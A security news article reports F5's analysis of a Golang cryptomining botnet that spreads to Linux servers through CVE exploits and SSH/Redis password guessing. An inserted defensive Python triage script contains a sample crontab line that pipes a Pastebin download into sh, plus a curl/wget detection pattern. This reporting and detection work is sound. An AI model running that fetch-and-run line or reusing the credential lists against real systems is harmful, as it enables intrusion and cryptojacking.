Cryptomining Campaign involves Golang malware to target Linux servers

Pierluigi Paganini July 05, 2019

Experts at F5 Networks discovered a cryptomining campaign that is delivering a new piece of Golang malware that targets Linux-based servers.

F5 experts uncovered a cryptominer campaign that is delivering a new strain of Golang malware that targets Linux-based servers.

The campaign began around June 10 and has already infected several thousand machines. The malicious code is hosted on an already compromised Chinese online store, and the threat actors use Pastebin to host the spearhead bash script.


“F5 researchers uncovered a cryptominer campaign delivering new Golang malware that targets Linux-based servers.” reads the analysis published by F5.

“The malware campaign propagates using 7 different methods: 4 web application exploits (2 targeting ThinkPHP, 1 targeting Drupal, and 1 targeting Confluence), SSH credentials enumeration, Redis database passwords enumeration, and also trying to connect other machines using found SSH keys.”

Attackers leverage well-known flaws to compromise target systems, including security issues in ThinkPHP (CVE-2019-9082 and CVE-unassigned), Atlassian Confluence (CVE-2019-3396), and the popular Drupalgeddon vulnerability (CVE-2018-7600).

Attackers also use SSH credentials enumeration and Redis database passwords enumeration, and try to connect to other machines using SSH keys found on the compromised host.

The malware is written in Go, the programming language developed by Google. Earlier this year, Cybaze-Yoroi ZLab experts analyzed another Golang botnet named GoBrut.

In the attacks aimed at Redis databases, the malicious code first attempts to connect to the default port without credentials, then tries to access using seven common passwords (admin, redis, root, 123456, password, user, and test).

When attempting to access SSH ports, the malware attempts to enumerate four usernames (root, admins, user, and test) and tries each with seven passwords (admins, root, test (appears twice), user, 123456, and password).

“The final propagation method is not done by the Go binary itself but another shell script which will be discussed in the next section. The script looks for existing known hosts in the SSH directory and then tries to connect to those machines over SSH and infect them, as well.” continues the report.

When the malware compromises a system, it downloads a bash script from pastebin.com and fetches several archives, one of which contains the Go malware. Downloaded files are saved to a hidden /tmp/.mysqli directory to prevent removal and mislead users.

One of the scripts extracted from the binary attempts to disable several security controls on the infected system, including SELinux.

The threat achieves persistence through a new crontab set up to download the bash script every 15 minutes. The script sets the Go malware up as a service, searches for competitors’ processes running from the /tmp directory, and kills them.
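A host-triage check for the persistence indicators described above (the hidden /tmp/.mysqli directory, the 15-minute crontab download from Pastebin, and SELinux being disabled), added here as an example that is not from F5's report or the original article. The use of curl or wget in the cron entry, the sample crontab, and the check of /etc/selinux/config are assumptions.

```python
import re
import subprocess
from pathlib import Path

# Indicators from the article: a hidden /tmp/.mysqli directory and a crontab
# entry that re-downloads a bash script from pastebin.com every 15 minutes.
DROP_DIR = ".mysqli"
# Assumption: the cron entry fetches with curl or wget (the article does not say).
FETCH_RE = re.compile(r"\b(curl|wget)\b.*pastebin\.com", re.I)

def suspicious_cron_lines(crontab_text):
    """Return (line, runs_every_15_min) for cron lines fetching from Pastebin."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if FETCH_RE.search(line):
            hits.append((line, line.split()[0] == "*/15"))
    return hits

def triage(tmp_dir, crontab_text, selinux_config_text=""):
    """Collect human-readable findings for one host."""
    findings = []
    if (Path(tmp_dir) / DROP_DIR).is_dir():
        findings.append(f"hidden drop directory present: {Path(tmp_dir) / DROP_DIR}")
    for line, every_15 in suspicious_cron_lines(crontab_text):
        schedule = "every 15 min" if every_15 else "other schedule"
        findings.append(f"cron download from Pastebin ({schedule}): {line}")
    # Assumption: checks the persistent setting only; a runtime change made with
    # setenforce would need `getenforce` to see.
    if re.search(r"^\s*SELINUX\s*=\s*disabled\b", selinux_config_text, re.M):
        findings.append("SELinux disabled in /etc/selinux/config")
    return findings

# Constructed sample crontab (the paste ID is a placeholder, not a real IoC).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * (curl -fsSL https://pastebin.com/raw/EXAMPLE||wget -qO- https://pastebin.com/raw/EXAMPLE)|sh
"""

if __name__ == "__main__":
    cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    cfg = Path("/etc/selinux/config")
    selinux = cfg.read_text() if cfg.is_file() else ""
    for finding in triage("/tmp", cron, selinux) or ["no indicators found"]:
        print(finding)
```

Run it as each user whose crontab should be inspected, since `crontab -l` only lists the calling user's entries.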

The archives downloaded by the malware include the main Go malware along with a Monero miner.

“The malware is mining XMR using the cryptonight algorithm and submits hashes to several public pools. At the time of this writing, this operation had earned the attacker less than $2,000 USD. However, this information is based only on the wallets our specific miners were using. It could be that the attacker has several wallets used by different parts of his botnet.” wrote the experts.

The malicious file was downloaded over 12,000 times from Pastebin, a figure that could give us an idea of the size of the botnet.

“It is clear that Go, although still used mostly by legitimate developers is also “Go-ing” to the dark side. Golang malware is starting to emerge on the threat landscape. Although this sample is not the most sophisticated piece of malware analyzed by F5 researchers, it has several unique qualities which make it notable.” conclude the experts.


Pierluigi Paganini

(SecurityAffairs – Golang malware, cryptominer)
